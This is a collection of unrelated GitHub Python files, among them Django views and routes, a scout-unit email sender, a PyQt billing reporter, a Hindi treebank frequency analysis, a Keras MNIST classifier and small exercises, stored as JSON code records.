+{"seq_id":"679247415","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\ndef usergame_list(request):\n \"\"\"Function to build an HTML report of games by user\"\"\"\n if request.method == 'GET':\n # Connect to project database\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Query for all games, with related user info\n db_cursor.execute(\"\"\"\n SELECT\n g.id,\n g.name,\n g.game_type_id,\n g.num_players,\n g.skill_level,\n u.id user_id,\n u.first_name || ' ' || u.last_name AS full_name\n FROM\n levelupapi_game g\n JOIN\n levelupapi_gamer gr ON g.creator_id = gr.id\n JOIN\n auth_user u ON gr.user_id = u.id\n \"\"\")\n\n dataset = db_cursor.fetchall()\n\n games_by_user = {}\n\n for row in dataset:\n game = Game()\n game.name = row['name']\n game.game_type_id = row['game_type_id']\n game.num_players = row['num_players']\n game.skill_level = row['skill_level']\n\n uid = row['user_id']\n\n # If we've already encountered this user, add this game to their list of games\n if uid in games_by_user:\n games_by_user[uid]['games'].append(game)\n\n # Otherwise add a new key-value pair for this user\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row[\"full_name\"],\n \"games\": [ game ]\n }\n \n # dict.values() is akin to Object.values(obj) in JS\n list_of_users_with_games = games_by_user.values()\n\n # Specify Django template and provide data context\n template = 'users/list_with_games.html'\n context = {\n 'usergame_list': list_of_users_with_games\n }\n\n return render(request, template, context)\n","repo_name":"skratz17/levelup-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6652301045","text":"#!/usr/bin/python2\n\nimport os\nimport getopt\nimport sys\n#import pg\n#import string\nimport dbobj\n#from procs import *\n#import time\n#import datetime\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\n \n\n##############################################################################\ndef main():\n \"\"\"This program is intended to be called from office.py\nObtains the following parameters:\n ou_id\n subject\n msg_body\n user_id - person who sent the message\n\n \"\"\"\n \n error_file = open('/tmp/jim.log', 'w')\n testing = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\")\n\n param = dbobj.paramrec()\n db = dbobj.dbinstance(param.dbname)\n\n ou_id = int(args[0])\n subject = args[1]\n msg_body = args[2]\n user_id = args[3]\n\n if testing:\n error_file.write(\"OU id = %d, subject = '%s', msg_body = '%s', user_id = %s\\n\" % (ou_id, subject, msg_body, user_id))\n\n ourec = dbobj.ourec(db, ou_id)\n if not ourec.found:\n if testing:\n error_file.write('Error: OU not found - OU id = %d\\n' % ou_id)\n return\n \n maillist = []\n\n # get email addresses of members of ou\n mail_by_ou(ourec, maillist, db, error_file)\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n #Get children ous\n children = ourec.child_list()\n for ch in children:\n mail_by_ou(ch, maillist, db, error_file)\n\n #if testing:\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n\n \n # Get details of the logged in user\n user = dbobj.adultrec(db, user_id) \n if not user.found:\n error_file.write('Error: User not found - User id = %d\\n' % user_id)\n return\n \n maillist.append(user.email)\n \n # Open link to mail server\n mailserver = smtplib.SMTP(param.smtpserver)\n\n\n #Get the html header\n htmlfile = param.template_dir + '/' + param.email_header\n mf = open(htmlfile)\n html_header = mf.read()\n mf.close()\n\n error_file.write('html opened = %s\\n' % htmlfile)\n\n #Get the footer of the email\n footerfile = param.template_dir + '/' + param.email_footer\n mf = open(footerfile)\n html_footer = mf.read()\n mf.close()\n error_file.write('footer opened = %s\\n' % footerfile)\n\n msg_footer = ' ' % (param.baseurl, param.pythondir, ourec.ou_id, ourec.name)\n\n error_file.write('Set up mailserver and body\\n')\n\n\n #Cycle through the mail list\n for em in maillist:\n #error_file.write(em)\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = subject\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = em\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n \n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_header + msg_body + msg_footer + html_footer, 'html')\n outer.attach(msgfile)\n \n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n error_file.write('Send email to %s\\n' % em)\n\n # Send me a copy\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = 'Copy of email to ' + ourec.name\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = 'scout@west.net.nz'\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n\n html_body = html_header + 'Subject : %s Sent by : %s %s Message body : %s' %(subject, user.forename, user.surname, msg_body) + html_footer\n\n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_body, 'html')\n outer.attach(msgfile)\n\n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n\n\n error_file.write('Finished sending email\\n')\n\n # Finished the loop, close connection to mail server\n mailserver.quit()\n\n error_file.close()\n except:\n error_file = open('/tmp/email_error.log', 'w')\n error_file.write('Error occured')\n error_file.close()\n return\n\n##############################################################################\ndef mail_by_ou(ourec, maillist, db, ef):\n \"\"\"Populates maillist parameter (which must be an array) with unique email addresses of members and parents.\nReceives two parameters\n ourec - the OU being processed\n maillist - the array for email addresses\n\"\"\"\n ef.write('Entered mail_by_ou, ou_id = %d\\n' % ourec.ou_id)\n membs = ourec.member_list(status = 'C')\n\n for s in membs:\n pers = dbobj.scoutrec(db, s.scout_id)\n if pers.found:\n if pers.email is not None and pers.email != '':\n if maillist.count(pers.email) == 0:\n maillist.append(pers.email)\n p1 = dbobj.adultrec(db, pers.parent1)\n if p1.found != 0 and p1.email is not None and p1.email != '':\n if maillist.count(p1.email) == 0:\n maillist.append(p1.email)\n p2 = dbobj.adultrec(db, pers.parent2)\n if p2.found != 0 and p2.email is not None and p2.email != '':\n if maillist.count(p2.email) == 0:\n maillist.append(p2.email)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jimboeri/scout","sub_path":"py/unit-email.py","file_name":"unit-email.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"877893091","text":"__author__ = 'Hk4Fun'\n__date__ = '2018/5/22 23:03'\nimport sys\n\nfrom PyQt5.QtWidgets import (QWidget, QHeaderView, QTableWidgetItem, QInputDialog)\n\nsys.path.append('..')\nfrom AirConditioningV2.ui import ui_Reporter\nfrom AirConditioningV2.ui import ui_Bill\nfrom AirConditioningV2.database import *\nfrom AirConditioningV2.logger import *\nfrom AirConditioningV2.filters import *\n\n\nclass DetailList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.showDetailList()\n\n def showDetailList(self, date=None):\n self.ui.tbDetail.clearContents()\n self.ui.tbDetail.setSortingEnabled(False) # http://doc.qt.io/qt-5/qtablewidget.html#setItem\n self.db.sqlExec('SELECT * FROM detail_list')\n row = 0\n while self.query.next():\n if date and not isEqDate(date, timeFormat(self.query.value(1))): continue\n self.ui.tbDetail.setRowCount(row + 1)\n self.ui.tbDetail.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbDetail.setItem(row, 1, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbDetail.setItem(row, 2, QTableWidgetItem(timeFormat(self.query.value(1))))\n self.ui.tbDetail.setItem(row, 3, QTableWidgetItem(timeFormat(self.query.value(2))))\n self.ui.tbDetail.setItem(row, 4, QTableWidgetItem(durationFormat(self.query.value(1), self.query.value(2))))\n self.ui.tbDetail.setItem(row, 5, QTableWidgetItem(str(self.query.value(4))))\n self.ui.tbDetail.setItem(row, 6, QTableWidgetItem(str(self.query.value(5))))\n self.ui.tbDetail.setItem(row, 7, QTableWidgetItem(str(self.query.value(6))))\n self.ui.tbDetail.setItem(row, 8, QTableWidgetItem(str(self.query.value(7))))\n self.ui.tbDetail.setItem(row, 9, QTableWidgetItem(str(self.query.value(8))))\n self.ui.tbDetail.setItem(row, 10, QTableWidgetItem(isSettle(self.query.value(9))))\n row += 1\n self.ui.tbDetail.setSortingEnabled(True)\n\n def saveDetail(self, client):\n sql = 'INSERT INTO detail_list VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, client.roomId)\n self.query.bindValue(1, int(client.openTime))\n self.query.bindValue(2, int(client.closeTime))\n self.query.bindValue(3, client.userLevel)\n self.query.bindValue(4, client.tempAdjust)\n self.query.bindValue(5, client.tempBackCount)\n self.query.bindValue(6, client.speedAdjust)\n self.query.bindValue(7, round(client.energy, 2))\n self.query.bindValue(8, round(client.cost, 2))\n self.query.bindValue(9, '0') # 单号为0表示还未结算\n self.db.sqlExec()\n\n\nclass BillList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.ui.tbBillList.cellDoubleClicked.connect(self.showBill)\n self.showBillList()\n\n def showBillList(self, date=None):\n self.ui.tbBillList.clearContents()\n self.ui.tbBillList.setSortingEnabled(False)\n self.db.sqlExec('SELECT * FROM bill_list')\n totalIncome = 0\n row = 0\n while self.query.next():\n if date and not isEqDate(date, self.query.value(0)): continue\n self.ui.tbBillList.setRowCount(row + 1)\n self.ui.tbBillList.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbBillList.setItem(row, 1, QTableWidgetItem(self.query.value(1)))\n self.ui.tbBillList.setItem(row, 2, QTableWidgetItem(self.query.value(2)))\n self.ui.tbBillList.setItem(row, 3, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbBillList.setItem(row, 4, QTableWidgetItem(str(round(self.query.value(4), 2))))\n self.ui.tbBillList.setItem(row, 5, QTableWidgetItem(discountFormat(self.query.value(5))))\n self.ui.tbBillList.setItem(row, 6, QTableWidgetItem(str(round(self.query.value(6), 2))))\n totalIncome += self.query.value(6)\n row += 1\n self.ui.tbBillList.setSortingEnabled(True)\n self.ui.label_totalIncome.setText(str(round(totalIncome, 2)))\n\n def showBill(self, row):\n orderId = self.ui.tbBillList.item(row, 1).text()\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n\n def addBill(self, orderId, roomId, userLevel, cost):\n sql = 'INSERT INTO bill_list(orderID, roomID, userLevel, cost, discount, receive) VALUES (?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.query.bindValue(2, userLevel)\n self.query.bindValue(3, cost)\n self.query.bindValue(4, mapDiscount(userLevel))\n self.query.bindValue(5, cost * mapDiscount(userLevel))\n self.db.sqlExec()\n\n\nclass Bill(QWidget):\n def __init__(self, db, orderId):\n super().__init__()\n self.db = db\n self.query = self.db.query\n self.orderId = orderId\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Bill.Ui_Form()\n self.ui.setupUi(self)\n self.ui.btPrinter.clicked.connect(self.printBill)\n self.showBill()\n\n def showBill(self):\n sql = 'SELECT * FROM bill_list WHERE orderID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, self.orderId)\n self.db.sqlExec()\n self.query.next()\n self.ui.label_date.setText(self.query.value(0))\n self.ui.label_orderId.setText(self.query.value(1))\n self.ui.label_roomId.setText(self.query.value(2))\n self.ui.label_userLevel.setText(mapUserLevel_c2w(self.query.value(3)))\n self.ui.label_cost.setText(str(round(self.query.value(4), 2)))\n self.ui.label_discount.setText(discountFormat(self.query.value(5)))\n self.ui.label_receive.setText(str(round(self.query.value(6), 2)))\n\n def printBill(self):\n pass\n\n\nclass Reporter(QWidget):\n def __init__(self, db, server):\n super().__init__()\n self.db = db\n self.server = server\n self.query = self.db.query\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Reporter.Ui_Form()\n self.ui.setupUi(self)\n # resize column both on content and stretch\n header = self.ui.tbDetail.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(2, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(10, QHeaderView.ResizeToContents)\n header = self.ui.tbBillList.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.ui.dateEdit.setDate(QDate.currentDate())\n\n self.ui.btRefresh.clicked.connect(self.slotRefTb)\n self.ui.btSettle.clicked.connect(self.slotSettle)\n self.ui.tabWidget.currentChanged.connect(self.slotChangePage)\n self.ui.dateEdit.dateChanged.connect(self.slotSelectDate)\n\n self.detailList = DetailList(self.ui, self.db)\n self.billList = BillList(self.ui, self.db)\n\n def slotSelectDate(self, date):\n self.detailList.showDetailList(date)\n self.billList.showBillList(date)\n\n def slotRefTb(self):\n self.ui.dateEdit.setDate(QDate.currentDate())\n self.detailList.showDetailList()\n self.billList.showBillList()\n\n def slotChangePage(self, idx):\n self.ui.dateEdit.setDate(QDate.currentDate())\n if idx == 0:\n self.detailList.showDetailList()\n elif idx == 1:\n self.billList.showBillList()\n\n def slotSettle(self):\n roomId, res = QInputDialog.getText(self, '请输入房间号', '房间号')\n if not res: return\n if not roomId:\n msg = '房间号不能为空'\n QMessageBox().warning(self, '房间号为空', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n isOpening, client = self.isOpening(roomId)\n if isOpening:\n msg = '当前房间空调尚未关机,是否强制关机?'\n res = QMessageBox().warning(self, '空调尚未关机', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n if res == QMessageBox.No: return\n self.disClient(client)\n self.detailList.saveDetail(client)\n if self.hasSettled(roomId):\n msg = '该房间号不存在或已结账!'\n QMessageBox().warning(self, '房间号', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.settleAccount(roomId)\n\n def hasSettled(self, roomId):\n sql = 'SELECT * FROM detail_list WHERE orderID = \"0\" AND roomID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return False if self.query.value(0) else True\n\n def isOpening(self, roomId):\n for client in self.server.serveQueue + self.server.waitQueue + self.server.tempQueue:\n if client.roomId == roomId:\n return True, client\n return False, None\n\n def disClient(self, client):\n client.room_temp_timer.stop()\n client.energy_timer.stop()\n client.sock.abort()\n client.closeTime = time.time()\n\n def getUserLevel(self, roomId):\n sql = 'SELECT userLevel FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def calcTotalCost(self, roomId):\n sql = 'SELECT SUM(cost) FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def setOrderId(self, roomId):\n orderId = str(int(time.time()))\n sql = 'UPDATE detail_list SET orderID = ? WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.db.sqlExec()\n return orderId\n\n def settleAccount(self, roomId):\n userLevel = self.getUserLevel(roomId)\n cost = self.calcTotalCost(roomId)\n # start a transaction\n if self.db.dbh.transaction():\n orderId = self.setOrderId(roomId)\n self.billList.addBill(orderId, roomId, userLevel, cost)\n if not self.db.dbh.commit():\n logger.error(self.db.dbh.lastError().text())\n if not self.db.dbh.rollback():\n logger.error(self.db.dbh.lastError().text())\n msg = '结账过程出错!'\n QMessageBox().critical(self, '结账失败', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n","repo_name":"Hk4Fun/qtstudy","sub_path":"AirConditioningV2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38146584232","text":"from django.urls import path\nfrom . import views\n\napp_name = \"users\"\n\nurlpatterns = [\n path(\"login/\", views.LoginView.as_view(), name=\"login\"),\n path(\"login/github/\", views.github_login, name=\"github_login\"),\n path(\"login/github/callback/\", views.github_callback, name=\"github_callback\"),\n path(\"login/kakao/\", views.kakao_login, name=\"kakao_login\"),\n path(\"login/kakao/callback/\", views.kakao_callback, name=\"kakao_callback\"),\n path(\"logout/\", views.logout_view, name=\"logout\"),\n path(\"signup/\", views.SignUpView.as_view(), name=\"signup\"),\n path(\n \"verify//\",\n views.complete_verification,\n name=\"complete_verification\",\n ),\n path(\"/\", views.UserProfileView.as_view(), name=\"profile\"),\n path(\"edit-profile/\", views.EditProfileView.as_view(), name=\"edit_profile\"),\n path(\"password-change/\", views.UpdatePassword.as_view(), name=\"password_change\"),\n path(\"switch-hosting/\", views.switch_hosting_mode, name=\"switch-hosting\"),\n path(\"switch-lang/\", views.switch_lang, name=\"switch-lang\"),\n]\n","repo_name":"KJYoung/airbnbV","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8705389657","text":"# -*- coding: utf-8 -*-\nfrom io import open\n# from conllu import parse\n\nwith open(\"hindi.conllu\", 'r') as file:\n temp = file.read()\n\nfrom collections import defaultdict\nimport itertools\nfrom collections import Counter\n\n\"\"\"**Solution 1a**\"\"\"\nprint(\"----------Solution 1a------------\")\ndef freqPOSword(parseText):\n posTag = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n # posTag[(word['upos'],word['form'])] += 1\n posTag[word['upos']] += 1\n posTag = dict(sorted(posTag.items(), key=lambda item: item[1] ,reverse=True))\n # return dict(itertools.islice(posTag.items(), 50))\n return posTag\n\nparseText = parse(temp)\nposTag = freqPOSword(parseText)\nprint(posTag)\n\n\"\"\"**Solution 1b**\"\"\"\nprint(\"----------Solution 1b------------\")\ndef freq50Pos():\n freq50most = dict()\n for sentence in parseText:\n for word in sentence:\n wordlist = freq50most.get(word['upos'],[])\n wordlist.append(word['form'])\n freq50most[word['upos']] = wordlist\n\n finaldict = dict()\n for key, wordlist in freq50most.items():\n posWord = dict(Counter(wordlist))\n posWord = dict(sorted(posWord.items(), key=lambda item: item[1] ,reverse=True))\n posWord = dict(itertools.islice(posWord.items(), 50))\n finaldict[key] = posWord\n print(key, posWord)\n return finaldict\n\nfreq50mostdict = freq50Pos()\n\n\"\"\"**Solution 1c** \"\"\"\nprint(\"----------Solution 1c------------\")\ndef findfreqGender(morphfeature):\n genderfreq = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morphfeature,'')\n if genstr != '':\n genderfreq[genstr] += 1\n return genderfreq\n\ngenderfreq = findfreqGender('Gender')\nprint('-------Gender--------')\nfor key, value in genderfreq.items():\n print(key, value)\ngenderfreq = findfreqGender('Case')\nprint('\\n-------Case----------')\nfor key, value in genderfreq.items():\n print(key, value)\nprint('\\n-------Number--------')\ngenderfreq = findfreqGender('Number')\nfor key, value in genderfreq.items():\n print(key, value)\n\n#find freq of Gender, case, number of words \ndef genFreq(morfeature):\n genderfreq = dict()\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morfeature,'')\n if genstr != '':\n genlist = genderfreq.get(genstr,[])\n genlist.append(word['form'])\n genderfreq[genstr] = genlist\n \n finalgenfreq = dict()\n for key, genlist in genderfreq.items():\n finalgenfreq[key] = dict(itertools.islice(dict(sorted(dict(Counter(genlist)).items(), key=lambda item: item[1] ,reverse=True)).items(),50))\n return finalgenfreq\n\ngenderfreq = genFreq('Gender')\nfor key, value in genderfreq.items():\n print(key, value)\n\ncasefreq = genFreq('Case')\nfor key, value in casefreq.items():\n print(key, value)\n\nnumberfreq = genFreq('Number')\nfor key, value in numberfreq.items():\n print(key, value)\n\n\"\"\"**Solution 1d**\"\"\"\nprint(\"----------Solution 1d------------\")\nfreq50Comb = defaultdict(int)\n\nfor sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get('Gender','')\n casestr = featdict.get('Case','')\n numstr = featdict.get('Number','')\n if genstr != '' and casestr != '' and numstr != '':\n freq50Comb[(genstr, casestr, numstr)] += 1\n\nfreq50Comb = dict(sorted(dict(freq50Comb).items(), key=lambda item: item[1] ,reverse=True))\nfreq50Comb\n\n\"\"\"**Solution 1e**\"\"\"\nprint(\"----------Solution 1e------------\")\n\nheaddict = dict()\n\ndef POShead():\n headdict = dict()\n for sentence in parseText:\n for word in sentence:\n if word['misc']['ChunkType'] == 'head':\n headlist = headdict.get(word['upos'], [])\n headlist.append(word['form'])\n headdict[word['upos']] = headlist\n\n finalheaddict = dict()\n for key, headlist in headdict.items():\n headCount = dict(sorted(dict(Counter(headlist)).items(), key=lambda item: item[1] ,reverse=True))\n finalheaddict[key] = headCount\n print(key, headCount)\n return finalheaddict\n\nheaddict = POShead()\n\n\"\"\"**Solution 1f**\"\"\"\nprint(\"----------Solution 1f------------\")\n\ndef getdirectedPOS():\n directedPOS = dict()\n # def getdirectedPOS():\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n # eachlist = directedPOS.get(word['deprel'], [])\n eachlist = directedPOS.get(mytup, [])\n eachlist.append(word['deprel'])\n directedPOS[mytup] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndirectedPOS = getdirectedPOS()\n\n# 1.f -> part 1\nallTuples = list(directedPOS.keys())\nprint(allTuples)\n\ntotaldirectedPOS = defaultdict(int)\n\nfor key1, eachlist in directedPOS.items():\n for key2 , eachitem in eachlist.items():\n totaldirectedPOS[key1] += eachitem\n print(key1, totaldirectedPOS[key1])\n\n\"\"\"**Solution 1g**\"\"\"\nprint(\"----------Solution 1g------------\")\n\ndef dependencyR():\n directedPOS = dict()\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n eachlist = directedPOS.get(word['deprel'], [])\n eachlist.append(mytup)\n directedPOS[word['deprel']] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndependencyRfreq = dependencyR()\n\ndepenRtotalfreq = defaultdict(int)\n\nfor key1, eachlist in dependencyRfreq.items():\n for key2 , eachitem in eachlist.items():\n depenRtotalfreq[key1] += eachitem\n print(key1, depenRtotalfreq[key1])\n\n","repo_name":"saqeeb360/Computational-Linguistics","sub_path":"Assignment2/Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74166080749","text":"import sys\nsys.path.insert(0, '../..')\n\nimport pyrosim\nimport math\n\nsim = pyrosim.Simulator(play_paused=True,debug=True,eval_time=5000)\n\n\n#for i in range(10):\n# segment = sim.send_cylinder(x=0,y=(-0.5-i),z=0.5, r=0,g=1,b=0,length=0.5,r1=0,r2=1,r3=0,radius=0.1,)\n\nsegment = [sim.send_cylinder(x=0,y=(0.5+i),z=0.5, r=((i+1)%2),g=(i%2),b=(i*3%2),length=.9,r1=0,r2=1,r3=0,radius=0.1) for i in range (10)]\n\njoint = [sim.send_hinge_joint(first_body_id=segment[i],second_body_id=segment[i+1],x=0,y=i+1,z=.5,n1=((i+1)%2),n2=0,n3=(i%2)) for i in range(9)]\n\nsensor = [sim.send_touch_sensor(body_id=segment[i]) for i in range(10)]\n\nsneuron = [sim.send_sensor_neuron(sensor[i]) for i in range(10)]\n\nmneuron = [sim.send_motor_neuron(joint[i]) for i in range(9)]\n\nsynapse = [sim.send_developing_synapse(sneuron[i],mneuron[i],start_weight=-10,end_weight=10,start_time=0, end_time=1) for i in range(9)]\n\nsim.start()\n","repo_name":"erichmatt/ludocrap","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40627961216","text":"class Solution:\n def addDigits(self, num: int) -> int:\n if num==0: return 0\n x=[]\n while (num):\n x.append(num%10)\n num=num//10\n ans=x[0]\n if len(x)==1:\n return int(ans)\n p=sum(x)\n return self.addDigits(p)\n ","repo_name":"ShivGamer007/ShivCodeSxLeeTcode","sub_path":"0258-add-digits/0258-add-digits.py","file_name":"0258-add-digits.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10457036955","text":"'''Calculate the sum of two numbers.\nRepeat the code to check the sum for 5 sets of numbers.\nWrite Pseudocode, draw flow chart and python code using while loop.\n'''\ncounter=1\nwhile(counter<=5):\n print(\"Set \",counter)\n n1=int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n sum=n1+n2\n print(\"Sum of \",n1,\" and \",n2,\" is: \",sum)\n counter=counter+1\n","repo_name":"murshi-dev/PythonCodes","sub_path":"PytthonBasics/Chapter11n12Activity/FindSum5Setnumbers.py","file_name":"FindSum5Setnumbers.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3693395042","text":"import pyautogui as pag\nfrom time import sleep\n\ndef countdown():\n timer = 3\n\n while(timer != 0):\n print(timer)\n timer -= 1\n sleep(1)\n\ndef mine():\n pag.keyDown('o')\n sleep(1)\n pag.keyUp('o')\n sleep(2)\n\ncountdown()\n\n\nwhile(True):\n mine()","repo_name":"JSONCarrillo/Random-Python-Scripts","sub_path":"MC-Auto-Miner/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"42958563836","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 17:27:46 2018\n\n@author: Avinash Tiwari\n\"\"\"\n\nfrom keras.datasets import mnist\nimport matplotlib. pyplot as plt\n\n# Load dataset (download if needed)\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nplt.subplot(221)\nplt.imshow(X_train[0], cmap=plt.get_cmap('gray'))\nplt.subplot(222)\nplt.imshow(X_train[1], cmap=plt.get_cmap('gray'))\nplt.subplot(223)\nplt.imshow(X_train[2], cmap=plt.get_cmap('gray'))\nplt.subplot(224)\nplt.imshow(X_train[3], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.image_data_format()\n\n# fix the seed \nseed = 7\nnumpy.random.seed(seed)\n\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encoding\n# output - [ 0 0 0 0 0 1 0 0 0 0 ]\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\nnum_classes = y_train.shape[1]\n\ndef baseline_model():\n model = Sequential()\n model.add(Conv2D(8, (3,3), input_shape=(1,28,28), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n \n model.add(Flatten())\n model.add(Dense(4, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n \n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n \n return model\n\n# build a model\nmodel = baseline_model()\n\n# Fit \nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3,\n batch_size=32, verbose=2)\n\nmodel.save('model.h5')\n\n# Final eval\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"CNN error: %.2f%%\" % (100 - scores[1]*100))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AvinashTiwari/Artifical-intelligence","sub_path":"10_Docker_ml/Chap6-ML-Image/img-reco-train.py","file_name":"img-reco-train.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
